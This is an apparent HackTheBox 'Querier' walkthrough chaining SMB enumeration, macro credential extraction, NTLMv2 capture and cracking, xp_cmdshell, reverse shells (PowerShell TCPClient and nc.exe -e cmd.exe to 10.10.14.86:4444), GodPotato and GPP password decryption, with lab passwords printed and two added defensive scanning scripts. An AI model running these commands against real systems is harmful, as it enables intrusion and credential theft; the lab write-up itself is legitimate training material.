Querier

1. User

1.1. Recon

1.1.1. PortScan

┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# nmap 10.129.23.67 -p- --min-rate 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-20 09:45 EST
Warning: 10.129.23.67 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.23.67
Host is up (0.15s latency).
Not shown: 65424 closed tcp ports (reset), 97 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 201.09 seconds
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# nmap 10.129.23.67 -p 1433,445 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-20 09:43 EST
Nmap scan report for 10.129.23.67
Host is up (0.32s latency).

PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info:
|   10.129.23.67:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-20T14:24:00
|_Not valid after:  2055-11-20T14:24:00
| ms-sql-ntlm-info:
|   10.129.23.67:1433:
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: QUERIER
|     DNS_Domain_Name: HTB.LOCAL
|     DNS_Computer_Name: QUERIER.HTB.LOCAL
|     DNS_Tree_Name: HTB.LOCAL
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-11-20T14:43:53+00:00; 0s from scanner time.

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-11-20T14:43:48
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.46 seconds
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# nxc smb 10.129.23.67 -u '' -p '' --generate-hosts-file hosts
SMB         10.129.23.67    445    QUERIER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:QUERIER) (domain:HTB.LOCAL) (signing:False) (SMBv1:None) (Null Auth:True)
SMB         10.129.23.67    445    QUERIER          [+] HTB.LOCAL\:

┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# cat hosts
10.129.23.67     QUERIER.HTB.LOCAL QUERIER

┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# cat hosts >> /etc/hosts

┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# nxc smb 10.129.23.67 -u '' -p '' --generate-krb5-file /etc/krb5.conf
SMB         10.129.23.67    445    QUERIER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:QUERIER) (domain:HTB.LOCAL) (signing:False) (SMBv1:None) (Null Auth:True)
SMB         10.129.23.67    445    QUERIER          [+] HTB.LOCAL\:

1.2. SMB

┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# nxc smb 10.129.23.67 -u '' -p '' --shares
SMB         10.129.23.67    445    QUERIER          [*] Windows 10 / Server 2019 Build 17763 x64 (name:QUERIER) (domain:HTB.LOCAL) (signing:False) (SMBv1:None) (Null Auth:True)
SMB         10.129.23.67    445    QUERIER          [+] HTB.LOCAL\:
SMB         10.129.23.67    445    QUERIER          [-] Error enumerating shares: STATUS_ACCESS_DENIED

┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# smbclient -N -L //10.129.23.67

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Reports         Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.23.67 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# smbmap -H 10.129.23.67

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.129.23.67, no fun for you...
[*] Closed 1 connections

Three SMB null-session enumeration methods were tried here; only smbclient succeeded. After updating nxc to the latest version it lists the shares as well.
[screenshot: nxc share listing after the update]

There is a Reports share.

┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# smbclient -N  //10.129.23.67/Reports
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 28 18:23:48 2019
  ..                                  D        0  Mon Jan 28 18:23:48 2019
  Currency Volume Report.xlsm         A    12229  Sun Jan 27 17:21:34 2019

                5158399 blocks of size 4096. 849560 blocks available

smb: \> get "Currency Volume Report.xlsm"
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (15.3 KiloBytes/sec) (average 15.3 KiloBytes/sec)
smb: \>
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# file Currency\ Volume\ Report.xlsm
Currency Volume Report.xlsm: Microsoft Excel 2007+

The workbook opens empty. For Office files like this, the usual CTF approach is to unzip them (an .xlsm is just a ZIP archive).

After unzipping I found a binary .bin file:

┌──(root㉿kali)-[~/shares/Currency Volume Report/xl]
└─# ls
_rels  styles.xml  theme  vbaProject.bin  workbook.xml  worksheets

┌──(root㉿kali)-[~/shares/Currency Volume Report/xl]
└─# strings  vbaProject.bin
 macro to pull data for client volume reports
n.Conn]
Open
rver=<
SELECT * FROM volume;
word>
 MsgBox "connection successful"
Set rs = conn.Execute("SELECT * @@version;")
Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
 further testing required
Attribut
e VB_Nam
e = "Thi
sWorkboo
0{00020P819-
$0046}
|Global
Spac
dCreat
Pred
ecla
BExpo
Templ
ateDeriv
Bustomi
acro to @pull d
for clie
nt volu
reports
further
 testing@ requi
ub Conne
ct()
 As A DODB.
iohn
ecordset
Dr={SQ
L Server
=QUER
IER;@Bste
d_G#=no;D
@;Uid
<;Pwd=
PcwTWTHR
wryjc$c6
!TimeouBt
J= ad#B
' MsgBox
J su
ccessfulq@
Exec
SELECT *( @@
b @Bt
OMD~E
heet
s(1).Ran
ge("A1")
@\pyFrom
$rs.Cl
nEnd IfE
Attribut
e VB_Nam
e = "She@et1"
t0{000
20820-
$0046
|Global!
Spac
dCrea
tabl
Pre decla
BExp
Temp
lateDeri
Bustom
Excel
Win16
Win32
Win64x
VBA6
VBA7
Project1
stdole
VBAProject
Office
ThisWorkbook|
_Evaluate
Sheet1
Connect\
Workbookk
connu
ADODBs
Connection
Recordset
ConnectionString
ConnectionTimeout
State
adStateOpen
ExecuteY
Sheets
Range
CopyFromRecordsetV
Worksheet
VBAProje
stdole>
*\G{00
020430-
6}#2.0#0
#C:\Wind
ows\Syst em32\
tlb#OLE
Automati
EOffDic
2DF8D04C
-5BFA-10
1B-BDE5
gram Fil
es\Commo
Micros
oft Shar
ed\OFFIC
E16\MSO.0DLL#
M 1@6.0 Ob
Library
ThisW
orkbookG
1Bxq
Sheet1G
S@#e@Xt
ThisWorkbook
Sheet1
ID="{7819C482-CC73-4FB3-8245-31BB2E19C38A}"
Document=ThisWorkbook/&H00000000
Document=Sheet1/&H00000000
HelpFile=""
Name="VBAProject"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="191BC9EFCDEFCDEFCDEFCD"
DPB="8D8F5D2BA59EA69EA69E"
GC="0103D1D2D2D2D22D"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisWorkbook=26, 26, 1062, 609, C
Sheet1=52, 52, 1088, 635, C
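As an added example (my own code, not from the write-up or from the box's files): a small triage script that treats the .xlsm as the ZIP it is, pulls xl/vbaProject.bin and scans the raw VBA stream for ODBC/OLEDB connection strings that carry a password, reporting server, database and user but never the secret itself. Literal text in module streams usually survives MS-OVBA compression, which is why the connection string above was readable with strings; the chopped copies ('Dr={SQ' / 'L Server' / '=QUER') are likely the same text interleaved with compression back-references, so a clean miss from a byte-level scan is not proof of absence. The sample workbook is constructed in memory with a placeholder password; all function names are mine.

```python
"""Triage an .xlsm for hard-coded database credentials in its VBA project.

Added example, not code from the original write-up. An .xlsm is a ZIP archive
and the macro project is stored as xl/vbaProject.bin; literal text in module
streams usually survives MS-OVBA compression, so a byte-level regex is enough
to catch connection strings like the one found in this box's workbook.
"""
import io
import re
import zipfile

SECRET_KEYS = ("pwd", "password")
# key=value pairs separated by ';' (ODBC/OLEDB style); values stop at quotes,
# line ends or NUL bytes so the match does not run into surrounding p-code.
PAIR_RE = re.compile(rb"([A-Za-z_ ]{2,24})=([^;\"'\r\n\x00]{1,128})")
# Starts of a connection string that a macro would hand to ADODB.
ANCHOR_RE = re.compile(rb"(?i)(driver=\{[^}]*\}|provider=|data source=|server=)")


def scan_vba_blob(blob: bytes) -> list:
    """Return one record per connection string that carries a password.

    Records hold server/database/user and which key held the secret; the
    password value itself is deliberately never copied into the result.
    """
    findings = []
    covered = 0  # offset up to which bytes belong to an already-reported string
    for m in ANCHOR_RE.finditer(blob):
        if m.start() < covered:
            continue
        window = blob[m.start(): m.start() + 512]
        pairs, secret_end = {}, None
        for p in PAIR_RE.finditer(window):
            key = p.group(1).strip().lower().decode("latin-1")
            pairs.setdefault(key, p.group(2).decode("latin-1"))
            if key in SECRET_KEYS and secret_end is None:
                secret_end = p.end()
        if secret_end is None:
            continue  # anchor without a password, e.g. a trusted-connection string
        covered = m.start() + secret_end
        findings.append({
            "offset": m.start(),
            "server": pairs.get("server") or pairs.get("data source"),
            "database": pairs.get("database") or pairs.get("initial catalog"),
            "user": pairs.get("uid") or pairs.get("user id"),
            "secret_key": next(k for k in SECRET_KEYS if k in pairs),
        })
    return findings


def scan_workbook(data: bytes) -> dict:
    """Open an .xlsm given as bytes and scan every vbaProject.bin inside it."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        vba_parts = [n for n in zf.namelist() if n.lower().endswith("vbaproject.bin")]
        findings = [f for n in vba_parts for f in scan_vba_blob(zf.read(n))]
    return {"has_macros": bool(vba_parts), "findings": findings}


def build_sample_xlsm(with_macro: bool = True) -> bytes:
    """Constructed sample: a minimal ZIP shaped like an .xlsm. The VBA stream
    mimics the Querier macro but uses a placeholder password, and is padded
    with NUL bytes to resemble its binary surroundings."""
    macro = (b"Sub Connect()\r\n"
             b"  conn.ConnectionString = \"Driver={SQL Server};Server=QUERIER;"
             b"Trusted_Connection=no;Database=volume;Uid=reporting;"
             b"Pwd=EXAMPLE_PASSWORD\"\r\n"
             b"  Set rs = conn.Execute(\"SELECT * FROM volume;\")\r\n"
             b"End Sub\r\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_macro:
            zf.writestr("xl/vbaProject.bin", b"\x00" * 64 + macro + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_xlsm()
    report = scan_workbook(blob)
    print("macros present:", report["has_macros"])
    for f in report["findings"]:
        print(f"  credential at offset {f['offset']}: server={f['server']} "
              f"db={f['database']} user={f['user']} ({f['secret_key']}=<redacted>)")
```

Run it as `python scan_xlsm.py "Currency Volume Report.xlsm"` to check a real workbook; with no argument it scans the constructed sample. The same scan applies to .docm/.pptm files, which keep their project under word/ or ppt/ instead of xl/.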

1.3. mssql

We now have MSSQL credentials: -u reporting -p 'PcwTWTHRwryjc$c6'

┌──(root㉿kali)-[~/shares/Currency Volume Report/xl]
└─# nxc mssql  10.129.23.67 -u reporting -p 'PcwTWTHRwryjc$c6'  --local-auth
MSSQL       10.129.23.67    1433   QUERIER          [*] Windows 10 / Server 2019 Build 17763 (name:QUERIER) (domain:HTB.LOCAL)
MSSQL       10.129.23.67    1433   QUERIER          [-] QUERIER\reporting:PcwTWTHRwryjc$c6 (Login failed for user 'reporting'. Please try again with or without '--local-auth')

┌──(root㉿kali)-[~/shares/Currency Volume Report/xl]
└─# nxc mssql  10.129.23.67 -u reporting -p 'PcwTWTHRwryjc$c6'
MSSQL       10.129.23.67    1433   QUERIER          [*] Windows 10 / Server 2019 Build 17763 (name:QUERIER) (domain:HTB.LOCAL)
MSSQL       10.129.23.67    1433   QUERIER          [-] HTB.LOCAL\reporting:PcwTWTHRwryjc$c6

nxc authentication failed (it tried HTB.LOCAL\reporting), but impacket-mssqlclient with -windows-auth connects successfully; the login is the local Windows account QUERIER\reporting, as enum_users shows.

┌──(root㉿kali)-[~/shares/Currency Volume Report/xl]
└─# impacket-mssqlclient 'reporting:PcwTWTHRwryjc$c6@10.129.23.67' -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL (QUERIER\reporting  reporting@volume)> enum_users
UserName             RoleName   LoginName           DefDBName   DefSchemaName       UserID                                                           SID
------------------   --------   -----------------   ---------   -------------   ----------   -----------------------------------------------------------
dbo                  db_owner   NULL                NULL        dbo             b'1         '   b'010500000000000515000000e5cfd9d970fd97dacb23a5d1f4010000'

guest                public     NULL                NULL        guest           b'2         '                                                         b'00'

INFORMATION_SCHEMA   public     NULL                NULL        NULL            b'3         '                                                          NULL

reporting            db_owner   QUERIER\reporting   volume      dbo             b'5         '   b'010500000000000515000000e5cfd9d970fd97dacb23a5d1ea030000'

sys                  public     NULL                NULL        NULL            b'4         '                                                          NULL

SQL (QUERIER\reporting  reporting@volume)> enable_xp_cmdshell
ERROR(QUERIER): Line 105: User does not have permission to perform this action.
ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(QUERIER): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (QUERIER\reporting  reporting@volume)> enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor
----------   --------   ---------------   ----------   -------   -------

Ordinary permissions: not a DBA, and no identities available to impersonate.

1.4. NTLMv2-SSP

First grab the service account's NTLMv2-SSP hash:
start Responder listening, then use xp_dirtree to trigger an outbound SMB connection.

SQL (QUERIER\reporting  reporting@volume)> xp_dirtree //10.10.14.86/share

┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.23.67
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc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
[+] Exiting...
MSSQL-SVC::QUERIER:1122334455667788:0384cd21b8d8cb6f1ad9796a876934c3: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:corporate568

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)

MSSQL-SVC corporate568

Log in with it:

┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# impacket-mssqlclient 'MSSQL-SVC:corporate568@10.129.23.67' -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL (QUERIER\mssql-svc  dbo@master)> enum_db
name     is_trustworthy_on
------   -----------------
master                   0

tempdb                   0

model                    0

msdb                     1

volume                   0

SQL (QUERIER\mssql-svc  dbo@master)> enum_users
UserName                            RoleName   LoginName                           DefDBName   DefSchemaName       UserID                                                                   SID
---------------------------------   --------   ---------------------------------   ---------   -------------   ----------   -------------------------------------------------------------------
##MS_AgentSigningCertificate##      public     ##MS_AgentSigningCertificate##      master      NULL            b'6         '   b'01060000000000090100000014996a2fb6d6ef7960d6ad52ac60318368179ae7'

##MS_PolicyEventProcessingLogin##   public     ##MS_PolicyEventProcessingLogin##   master      dbo             b'5         '                                   b'b358f79fa0d32a4e9087d7897f494f6a'

dbo                                 db_owner   sa                                  master      dbo             b'1         '                                                                 b'01'

guest                               public     NULL                                NULL        guest           b'2         '                                                                 b'00'

INFORMATION_SCHEMA                  public     NULL                                NULL        NULL            b'3         '                                                                  NULL

mssql-svc                           public     QUERIER\mssql-svc                   master      dbo             b'7         '           b'010500000000000515000000e5cfd9d970fd97dacb23a5d1e9030000'

sys                                 public     NULL                                NULL        NULL            b'4         '                                                                  NULL

SQL (QUERIER\mssql-svc  dbo@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee    grantor
----------   --------   ---------------   ----------   --------   ----------------------------
b'USER'      msdb       IMPERSONATE       GRANT        dc_admin   MS_DataCollectorInternalUser

We can impersonate the dc_admin user, but the impersonation fails here:

SQL (QUERIER\mssql-svc  dbo@msdb)> exec_as_user dc_admin
ERROR(QUERIER): Line 1: Cannot execute as the database principal because the principal "dc_admin" does not exist, this type of principal cannot be impersonated, or you do not have permission.

SQL (QUERIER\mssql-svc  dbo@msdb)> SELECT name, type_desc FROM msdb.sys.database_principals WHERE name = 'dc_admin';
name       type_desc
--------   -------------
dc_admin   DATABASE_ROLE

In msdb, dc_admin is a database role, not a user that can be impersonated.

  • exec_as_user only targets "security principals" such as users, certificates and symmetric keys; a role cannot be impersonated directly.

1.5. xp_cmdshell

Luckily, though, our current user can execute commands:

SQL (QUERIER\mssql-svc  dbo@msdb)> enable_xp_cmdshell
INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

SQL (QUERIER\mssql-svc  dbo@msdb)> xp_cmdshell whoami
output
-----------------
querier\mssql-svc

NULL

Spawning a reverse shell here was blocked by the antivirus:

SQL (QUERIER\mssql-svc  dbo@msdb)> xp_cmdshell powershell -e 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
output
--------------------------------------------------------------------------------
#< CLIXML

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><S S="Error">At line:1 char:1_x000D__x000A_</S><S S="Error">+ $client = New-Object System.Net.Sockets.TCPClient("10.10.14.86",4444) ..._x000D__x000A_</S><S S="Error">+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><S S="Error">This script contains malicious content and has been blocked by your antivirus software._x000D__x000A_</S><S S="Error">    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException_x000D__x000A_</S><S S="Error">    + FullyQualifiedErrorId : ScriptContainedMaliciousContent_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S></Objs>

The error says “This script contains malicious content and has been blocked by your antivirus software”.

Transfer the binary instead and use nc for the reverse shell:

EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://10.10.14.86/nc.exe -Outfile c:\users\mssqlsvc\nc.exe"'

That download failed as well, so switch to fetching it over SMB:

(kali)
impacket-smbserver share ./ -smb2support

(victim)
SQL (QUERIER\mssql-svc  dbo@msdb)> xp_cmdshell \\10.10.14.86\share\nc.exe -e cmd.exe 10.10.14.86 4444
┌──(root㉿kali)-[~/shares/Currency Volume Report/xl]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.86] from (UNKNOWN) [10.129.23.67] 49679
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
querier\mssql-svc

C:\Windows\system32>

2. system

2.1. (Unintended) Potato privilege escalation

The Potato family works across the board on old boxes; after all, this machine was released in 2019.

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
c:\Users\mssql-svc\Desktop>copy \\10.10.14.86\share\GodPotato.exe .\GodPotato.exe
copy \\10.10.14.86\share\GodPotato.exe .\GodPotato.exe

c:\Users\mssql-svc\Desktop>.\GodPotato.exe  -cmd "cmd /c whoami"
.\GodPotato.exe  -cmd "cmd /c whoami"
[*] CombaseModule: 0x140721998462976
[*] DispatchTable: 0x140722000776400
[*] UseProtseqFunction: 0x140722000154720
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\35f4f931-dd83-458b-8848-34b35d4d7f79\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000bc02-0584-ffff-ca92-217fd53f55f0
[*] DCOM obj OXID: 0xc5fe61b71d4546b
[*] DCOM obj OID: 0x5b4ab1aec979c051
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 840 Token:0x812  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3748
nt authority\system

2.2. GPP Password

Upload winPEAS to check for escalation paths.

It finds a GPP password:

 [+] GPP Password
C:\Users\All Users\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
c:\Users\Public>type "C:\Users\All Users\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml"
type "C:\Users\All Users\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml"
<?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1">
<Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups>
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# gpp-decrypt CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ
MyUnclesAreMarioAndLuigi!!1!
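As an added example (my own code, not part of the write-up): a scanner for the Group Policy Preferences XML files that winPEAS flagged. Any cpassword attribute is a plaintext-equivalent credential because the AES key Microsoft used for it is public, which is exactly what gpp-decrypt relies on; a defender wants to find every such file in SYSVOL and in the local GPO history cache (the path winPEAS reported above) and remove them. This script walks a directory tree and reports each item without printing the value. The sample Groups.xml is constructed from the one recovered on this box, with the cpassword replaced by a placeholder; function names are mine.

```python
"""Find Group Policy Preferences items that still carry a cpassword.

Added example, not code from the original write-up. GPP XML files store
credentials in a cpassword attribute encrypted with a fixed AES key that
Microsoft published, so every such attribute is a plaintext-equivalent
secret. This walks a directory (a SYSVOL copy, or the local GPO history
cache seen on this box) and reports each item without printing the value.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files known to carry cpassword attributes.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}


def cpassword_items(xml_bytes: bytes, source: str = "<memory>") -> list:
    """Return one record per element with a cpassword attribute."""
    root = ET.fromstring(xml_bytes)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    records = []
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if cpw is None:
            continue
        # <Properties> sits under <User>/<Service>/<Task>/...; the parent carries
        # the item name and its last-changed timestamp.
        item = parent_of.get(elem, elem)
        records.append({
            "file": source,
            "item": item.tag,
            "account": (elem.get("userName") or elem.get("accountName")
                        or elem.get("runAs") or elem.get("username")),
            "changed": item.get("changed"),
            "cpassword_len": len(cpw),  # presence and size only, never the value
        })
    return records


def scan_tree(base_dir: str) -> list:
    """Walk base_dir and collect cpassword records from every GPP XML file."""
    found = []
    for dirpath, _dirs, files in os.walk(base_dir):
        for name in files:
            if name.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            try:
                found.extend(cpassword_items(data, path))
            except ET.ParseError:
                continue  # malformed file: skip it rather than abort the sweep
    return found


# Constructed sample: the Groups.xml recovered on this box, with the real
# cpassword replaced by a placeholder so the snippet carries no secret.
SAMPLE_GROUPS_XML = (
    b'<?xml version="1.0" encoding="UTF-8" ?>'
    b'<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    b'<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" '
    b'image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" '
    b'userContext="0" removePolicy="0" policyApplied="1">'
    b'<Properties action="U" newName="" fullName="" description="" '
    b'cpassword="PLACEHOLDER_CPASSWORD_BASE64" changeLogon="0" noChange="0" '
    b'neverExpires="1" acctDisabled="0" userName="Administrator"/></User></Groups>'
)
# A preference file without cpassword, to show it produces no record.
SAMPLE_DRIVES_XML = (b'<?xml version="1.0"?><Drives><Drive name="H:">'
                     b'<Properties action="U" path="//fileserver/home"/></Drive></Drives>')


def demo() -> list:
    """Write the samples into a temp tree shaped like the GPO history cache and scan it."""
    base = tempfile.mkdtemp(prefix="gpp-scan-")
    gpo = os.path.join(base, "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                       "Machine", "Preferences")
    os.makedirs(os.path.join(gpo, "Groups"))
    os.makedirs(os.path.join(gpo, "Drives"))
    with open(os.path.join(gpo, "Groups", "Groups.xml"), "wb") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    with open(os.path.join(gpo, "Drives", "Drives.xml"), "wb") as fh:
        fh.write(SAMPLE_DRIVES_XML)
    return scan_tree(base)


if __name__ == "__main__":
    import sys
    for rec in scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo():
        print(f"{rec['file']}: <{rec['item']}> account={rec['account']} "
              f"changed={rec['changed']} cpassword present ({rec['cpassword_len']} chars)")
```

Point it at a mounted SYSVOL (`python gpp_scan.py /mnt/sysvol`) or at the local history cache directory winPEAS listed; every record it returns is a credential that should be rotated and a preference item that should be removed, since deleting the XML does not undo the exposure.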
┌──(root㉿kali)-[~/Desktop/htb/Querier]
└─# evil-winrm -i 10.129.23.67 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
